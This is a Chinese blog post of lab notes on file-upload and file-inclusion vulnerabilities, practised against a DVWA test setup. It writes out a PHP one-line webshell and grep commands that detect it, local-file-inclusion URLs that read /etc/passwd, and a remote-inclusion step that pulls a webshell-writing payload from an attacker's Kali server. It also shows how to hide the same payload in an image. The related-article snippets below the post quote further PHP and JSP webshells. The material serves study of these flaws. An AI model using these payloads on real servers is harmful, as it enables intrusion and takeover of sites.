文件上传&文件包含漏洞

已于 2022-01-30 11:53:09 修改
阅读量504 收藏 2
点赞数 1
分类专栏: Web 文件漏洞 文章标签: web php 安全漏洞
于 2021-04-22 00:33:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51927659/article/details/115917393
版权

欢迎大家访问我的GitHub博客

https://lunan0320.github.io/
一、文件上传漏洞

对上传的文件格式之类的没有检测

1、 一句话木马的书写格式
<?php @eval($_POST["myshell"]) ?>
2、正则过滤
egrep -R 'eval\(\$_POST\['        /var/www/dvwa

-R是表示正则展开,egrep表示调用正则表达式,/var是路径

3、自定义过滤
fgrep -R 'eval($_POST[' /var/www

fgrep表示自定义格式过滤

4、连接远程主机
ssh 192.168.13.135
二、文件包含漏洞

没有对包含入的文件做过滤

1、本地文件包含:LFI
http://www.baidu.com/index.php?page=c.php
http://www.baidu.com/index.php?page=u.jpg
http://www.baidu.com/index/php?page=/etc/passwd
2、远程文件包含RFI
http://www.baidu.com/index.php?page=http://webserver/u.php
http://www.baidu.com/index.php?page=http://webserver/f.jpg

** 3、文件包含后台php代码如下:**

<?php
$file=$_GET['page'];
?>

远程文件包含更容易一点
包含图片是为了让图片执行并生成一个webshell

4、本地文件包含漏洞
制作一句话图片木马

1、制作含有一句话木马的图片(使用edjpgcom工具生成)

<?fputs(fopen("lunanshell.php","w"),'<?php @eval($_POST["lunan"]);?>')?>

2、上传含有图片木马的图片1.jpg

3、文件包含,执行文件并生成文件后门

http://192.168.31.138/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/1.jpg

4、蚁剑连接Webshell
后门链接,直接蚁剑连接

http://192.168.31.138/dvwa/vulnerabilities/fi/lunanshell.php
5、远程文件包含漏洞

1、kali开启apache2服务器

systemctl start apache2  #开启命令
systemctl status apache2 #检查是否开启

2、远程服务器上创建木马文件lunan.txt

<?fputs(fopen("kalishell.php","w"),'<?php @eval($_POST["lunan"]);?>') ?>

3、远程文件文件包含

http://192.168.31.138/dvwa/vulnerabilities/fi/?page=http://192.168.31.131/lunan.txt

4、蚁剑连接Webshell

http://192.168.31.138/dvwa/vulnerabilities/fi/kalishell.php
lunan0320
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
文件上传漏洞攻击与防范方法
m0_38103658的博客
08-30 4万+
文件上传漏洞攻击与防范方法 文件上传漏洞简介: 文件上传漏洞web安全中经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞文件上传漏洞危害: 上传漏洞与SQL注入或 XSS相比 , 其风险更大 , 如果 Web应用程序存在上传漏洞 , 攻击者上传...
文件上传漏洞的思维导图
04-19
总之,防止文件上传漏洞需要全面的安全策略,包括前端与后端的双重验证、合理的文件名和MIME类型处理、服务器配置的加固以及定期的安全更新和漏洞扫描。对于开发人员来说,理解这些攻击手段和防御措施至关重要,以...
文件包含漏洞上传漏洞
sunnygao的博客
09-29 3161
文章目录文件包含漏洞PHP文件包含漏洞远程文件包含漏洞截断包含JSP文件包含文件包含漏洞预防文件上传漏洞解析漏洞服务端检测目录验证文件内容检测预防方法一句话木马 sql注入,有sql盲注,基于布尔的注入,还有基于时间的注入,union的使用条件 字段数保持一致,可以用其他数据凑数补上。 文件包含漏洞 PHP文件包含漏洞文件包含:共用函数写到单个文件中,然后多次调用, ​ 文件包含漏洞:包含的文件可以被替换成恶意文件。 PHP提供了四个文件包含函数,分别是include() 找不到被包含的文件只会产生警
【网络安全渗透测试零基础入门必知必会】之什么是文件包含漏洞&分类(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
HUANGXIN9898的博客
07-10 728
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞
文件上传文件包含漏洞
Ma79328的博客
12-28 335
1.编写木马文件 2.用Windows命令合并木马文件和图片 3.用Linux命令查看木马文件 4.上传木马到【getimagesize】 5.上传成功 6.利用本地文件包含漏洞打开木马文件 7.木马成功执行 8.jijuhua.php木马已经生成 9.间接访问 10.systeminfo执行成功最终获取服务器系统信息 也可以通过上传POST类型的webshell,通过蚁剑和菜刀进行连接 ...
文件上传/文件包含漏洞学习
seeicb的博客
05-20 1372
title: 文件上传/文件包含漏洞学习 date: 2016-04-25 21:52:19 categories: 安全 tags: Web安全 ** 文件上传漏洞 ** 在Web程序中,经常需要用到文件上传的功能。如用户或者管理员上传图片,或者其它文件。如果没有限制上传类型或者限制不严格被绕过,就有可能造成文件上传漏洞。如果上传了可执行文件或者网页脚本,就会导致网站被控制甚至服务器沦陷。 常...
文件包含
weixin_30241919的博客
08-02 132
文件包含函数 (1)require():跟include唯一不同的是,当产生错误时候,include下面继续运行而require停止运行了。(2)include():包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行。(3)require_once():只包含一次(4)include_once():这个函数跟include函数作用几乎相同,只是他在导入...
文件上传漏洞常见绕过方法
05-26
1、前端js检测文件格式 2、上传的文件时加入了“Content-Type”验证 3、文件后缀验证 4、文件后缀黑名单 5、文件头验证 6、文件内容初级验证 7、文件上传+文件包含
你不知道的文件上传漏洞php代码分析
12-18
文件上传漏洞是网络安全中一个重要的问题,特别是在PHP开发中,因为PHP经常被用来处理服务器端的文件上传。本文将深入探讨文件上传漏洞及其防范措施,主要关注PHP代码分析。 首先,我们要理解文件上传漏洞是如何...
文件上传漏洞训练平台.zip
10-14
文件上传漏洞是网络安全领域中的一个重要话题,特别是在渗透测试和网站安全维护中。此"文件上传漏洞训练平台.zip"提供了一个实战环境,让你可以逐步通过1到20关的挑战,深入理解和掌握如何发现并利用此类漏洞。在这...
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
BUUCTF:文件上传文件包含漏洞
YIHAHUHA的博客
11-10 1540
看到题目的第一感觉就是文件包含漏洞 再往下看看还有啥有用的信息 看来不可以直接查看上目录的文件 上传一个脚本试试 后缀和文件名都给改了 打开看看会不会运行 居然就可以运行了?? 还以为会有文件头识别啥的~~(以为要做一个图片马嘞) 简单的文件上传文件包含漏洞(主要是文件包含漏洞文件包含的大致解题思路就是上传一个 恶意的脚本上去,然后想办法在你访问这个脚本文件时让这个脚本可以在后端运行,从而...
文件上传漏洞文件包含漏洞渗透
qq_41838217的博客
12-07 1207
文件上传漏洞渗透 原理:利用网站文件上传对文件类型、后缀等未检测的漏洞进行渗透攻击。 目的:将木马脚本上传至网站后台服务器获取增删改权限,删库跑路。 工具:kali, OWASP(Open Web Application Security Project Broken Web Applications),burpsuite,China Chopper 漏洞分析: if (($uploaded_type == "image/jpeg") && ($uploaded_size <
文件上传+文件包含漏洞备忘录
weixin_43610673的博客
05-26 1598
原理:调用JS的selectFile()函数,将文件名转化为小写,然后通过substr获取文件名最后一个点好后面的后缀(包括点号)进行判断,可以采用白名单,也可以采用黑名单的方式。绕过方法:直接修改js代码或者使用抓包的方法修改请求内容绕过,可以先上传一个合法后缀名木马(如:hack.gif / hack.jpg),通过抓包修改为 jsp/php/asp。
文件上传漏洞或预习文件包含漏洞
Max_xi的博客
03-21 779
文件上传漏洞
文件包含漏洞
qq_41007744的博客
05-09 3678
程序开发人员通常会把可重复使用的函数写到单个文件中,在使用其它函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般称为包含程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用。正是这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞PHP包含php中提供四个文件包含的函数,分别是include(),include_once(),require(...
web安全:文件上传文件包含漏洞(php)
smb_yy的博客
09-06 823
执行方式 通过上传文件等方式,上传恶意代码文件,之后通过php文件包含函数执行; php文件包含函数 require():如果出现错误,会抛出一个警告 require()_once():一次性的require()函数 include():如果出现错误,会直接报错,并推出程序 include_once():一次性的include()函数 ...
文件上传漏洞详解
2301_76160896的博客
06-14 1364
文件上传漏洞,无非就是通过绕防火墙的拦截把木马文件上传到目标机上,然后控制目标机
文件上传文件包含漏洞
m0_51313985的博客
03-30 763
day2 什么是文件上传文件上传指用户在相应的权限下上传正常的图片或者文件内容。 什么是文件上传漏洞? 简单来说,文件上传漏洞指用户超过其权限,绕过限制上传了不允许上传的内容,这里上传的文件可以是木马、病毒、恶意脚本或者webshell等 最常见的一个webshell就是php一句话木马: <?php @eval($_POST[1]); ?> jsp: <%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
DVWA安全实验:文件上传与包含漏洞分析
"网络安全实验,涉及文件上传文件包含漏洞,使用DVWA测试环境,通过Kali Linux进行攻击机操作。" 在网络安全领域,文件上传文件包含是两种常见的Web应用程序安全漏洞,它们允许攻击者利用系统弱点来执行恶意...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值